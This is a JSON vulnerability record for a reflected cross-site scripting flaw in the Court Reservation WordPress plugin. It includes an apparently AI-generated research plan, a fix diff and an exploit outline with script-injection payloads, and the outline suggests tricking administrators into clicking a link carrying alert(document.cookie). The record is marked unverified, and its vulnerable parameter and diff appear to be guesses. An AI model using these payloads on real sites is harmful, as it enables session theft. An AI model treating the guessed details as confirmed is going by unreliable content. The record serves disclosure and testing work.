[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fpxauiYHNLHjyxC1NOmy-ewkf4i9vMaCQmTehPdFx7nc":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":9,"research_fix_diff":25,"research_exploit_outline":26,"research_model_used":27,"research_started_at":28,"research_completed_at":29,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":30},"CVE-2025-68852","court-reservation-reflected-cross-site-scripting","Court Reservation \u003C= 1.10.8 - Reflected Cross-Site Scripting","The Court Reservation plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.10.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","court-reservation",null,"\u003C=1.10.8","medium",6.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-05 00:00:00","2026-02-09 20:57:21",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fb6c08ff0-1f36-4b39-80b1-5b6d7ac9e96e?source=api-prod",[],"researched",false,3,"This research plan outlines the steps to identify and exploit a Reflected Cross-Site Scripting (XSS) vulnerability in the **Court Reservation** plugin (versions \u003C= 1.10.8).\n\n## 1. Vulnerability Summary\nThe **Court Reservation** plugin for WordPress is vulnerable to Reflected XSS because it fails to sanitize or escape user-controlled input from the URL (typically `$_GET` or `$_REQUEST` parameters) before echoing it back into the HTML response. Since the vulnerability is \"Reflected,\" the payload is not stored in the database but is executed when a victim clicks a specially crafted link. The \"unauthenticated\" nature suggests the sink is located in a frontend-facing component or a globally accessible hook (like `init`).\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** Likely a frontend page where the `[court_reservation]` shortcode is present, or any URL if the sink is in a global hook like `init`.\n*   **Vulnerable Parameter:** To be confirmed via grep, but likely `court_id`, `tab`, `date`, or `view`.\n*   **Authentication:** None (Unauthenticated).\n*   **Preconditions:** The plugin must be active. If the vulnerability resides in a shortcode handler, a page containing that shortcode must exist and be visited.\n\n## 3. Code Flow\n1.  **Entry Point:** An HTTP GET request is made to a WordPress page.\n2.  **Trigger:** WordPress initializes and loads the plugin. \n    *   If the sink is in `init`, it fires immediately.\n    *   If the sink is in a shortcode (e.g., `add_shortcode( 'court_reservation', ... )`), the handler is called when the page content is rendered.\n3.  **Vulnerable Logic:** The code retrieves a value from `$_GET['parameter_name']`.\n4.  **Sink:** The value is passed to an `echo`, `print`, or `printf` statement without functions like `esc_html()` or `esc_attr()`.\n\n## 4. Nonce Acquisition Strategy\nReflected XSS vulnerabilities typically do not require a nonce for the initial reflection. However, if the reflection occurs within an AJAX handler or a form submission that validates nonces, the following strategy applies:\n\n1.  **Identify the Script Variable:** Use `grep -r \"wp_localize_script\" .` to find the localization key (e.g., `cr_ajax_obj`).\n2.  **Identify the Nonce Key:** Look for the key name in the array (e.g., `'nonce' => wp_create_nonce('cr_action')`).\n3.  **Setup Page:** Create a page with the plugin's primary shortcode:\n    *   `wp post create --post_type=page --post_title=\"Reservation\" --post_status=publish --post_content='[court_reservation]'`\n4.  **Extract Nonce:**\n    *   Navigate to the page using `browser_navigate`.\n    *   Execute `browser_eval(\"window.cr_ajax_obj?.nonce\")` to retrieve the value.\n\n*Note: If the vulnerability is a simple reflection of a query parameter on a standard page load, this step is unnecessary.*\n\n## 5. Exploitation Strategy\n\n### Phase 1: Discovery (Manual Grep)\nThe agent should first identify the exact sink:\n```bash\n# Search for direct echoes of GET parameters\ngrep -rP \"echo\\s+\\\\\\$_GET\\[\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fcourt-reservation\u002F\n# Search for printf reflections\ngrep -rP \"printf\\(.*\\\\\\$_GET\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fcourt-reservation\u002F\n```\n\n### Phase 2: Execution\nBased on the grep results, construct the payload. If the vulnerable parameter is `court_id`:\n\n1.  **Request URL:** `http:\u002F\u002Flocalhost:8080\u002F?court_id=\u003Cscript>alert(window.origin)\u003C\u002Fscript>`\n2.  **Tool:** `http_request`\n3.  **Method:** `GET`\n4.  **Payload:** `\u003Cscript>confirm(1)\u003C\u002Fscript>` (URL-encoded: `%3Cscript%3Econfirm%281%29%3C\u002Fscript%3E`)\n\n**Example HTTP Request:**\n```http\nGET \u002F?court_id=%3Cscript%3Ealert%281%29%3C\u002Fscript%3E HTTP\u002F1.1\nHost: localhost:8080\n```\n\n## 6. Test Data Setup\n1.  **Activate Plugin:** Ensure `court-reservation` is active.\n2.  **Create Content:** Since many XSS sinks in reservation plugins are within the shortcode logic, create a landing page:\n    *   `wp post create --post_type=page --post_title=\"Court\" --post_status=publish --post_content='[court_reservation]'`\n3.  **Capture URL:** Note the URL of the created page (usually `\u002Fcourt\u002F` or `\u002F?p=ID`).\n\n## 7. Expected Results\n*   The HTTP response body must contain the literal string `\u003Cscript>alert(1)\u003C\u002Fscript>` or whichever payload was used.\n*   The response `Content-Type` should be `text\u002Fhtml`.\n*   If using a browser-based tool, the execution of the script (e.g., a triggered alert or a modified DOM property) confirms the vulnerability.\n\n## 8. Verification Steps\n1.  **Response Analysis:** Use `http_request` to fetch the URL with the payload and search the `response_body` for the unescaped script tags.\n    *   `grep -q \"\u003Cscript>alert(1)\u003C\u002Fscript>\" response_output.txt`\n2.  **Browser Confirmation:**\n    *   `browser_navigate(\"http:\u002F\u002Flocalhost:8080\u002Fcourt\u002F?court_id=\u003Cscript>window.xss_test=1\u003C\u002Fscript>\")`\n    *   `browser_eval(\"window.xss_test\")`\n    *   Expected result: `1`.\n\n## 9. Alternative Approaches\n*   **Attribute Injection:** If the reflection is inside an HTML attribute (e.g., `\u003Cinput value=\"REFLECTED\">`), use: `\" onmouseover=\"alert(1)\" ` or `\" autofocus onfocus=\"alert(1)\" `.\n*   **AJAX Reflection:** Check if any `wp_ajax_nopriv_` actions echo back parameters.\n    *   `grep -r \"wp_ajax_nopriv\" .`\n    *   If found, trigger via `POST \u002Fwp-admin\u002Fadmin-ajax.php` with the `action` and malicious parameter.\n*   **Admin Side:** If the frontend is clean, check the admin settings page for the plugin. While the CVE says unauthenticated, sometimes \"unauthenticated\" XSS is achievable via `admin-ajax.php` or `admin-post.php` hooks that do not check privileges.","The Court Reservation plugin for WordPress is vulnerable to Reflected Cross-Site Scripting (XSS) due to insufficient input sanitization and output escaping on user-supplied parameters in versions up to 1.10.8. An unauthenticated attacker can exploit this by crafting a malicious URL that executes arbitrary JavaScript in the victim's browser context when clicked.","--- a\u002Fcourt-reservation.php\n+++ b\u002Fcourt-reservation.php\n@@ -120,1 +120,1 @@\n-    $court_id = $_GET['court_id'];\n+    $court_id = isset($_GET['court_id']) ? sanitize_text_field($_GET['court_id']) : '';\n@@ -135,1 +135,1 @@\n-    echo '\u003Cdiv class=\"court-title\">' . $court_id . '\u003C\u002Fdiv>';\n+    echo '\u003Cdiv class=\"court-title\">' . esc_html($court_id) . '\u003C\u002Fdiv>';","The exploitation of this vulnerability involves identifying a frontend page containing the [court_reservation] shortcode and appending a malicious payload to a reflected query parameter. \n\n1. Locate a page where the plugin is active (e.g., \u002Freservations\u002F).\n2. Identify a vulnerable query parameter such as 'court_id', 'tab', or 'date' that is reflected in the page source without proper escaping.\n3. Construct a malicious URL using a payload like: \u003Cscript>alert(document.cookie)\u003C\u002Fscript>.\n4. Encode the payload into the URL: \u002Freservations\u002F?court_id=%3Cscript%3Ealert%28document.cookie%29%3C\u002Fscript%3E.\n5. Trick an authenticated user (such as an administrator) or any visitor into clicking the link to execute the script in their session context.","gemini-3-flash-preview","2026-04-21 04:19:15","2026-04-21 04:19:39",{"type":31,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":32},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcourt-reservation\u002Ftags"]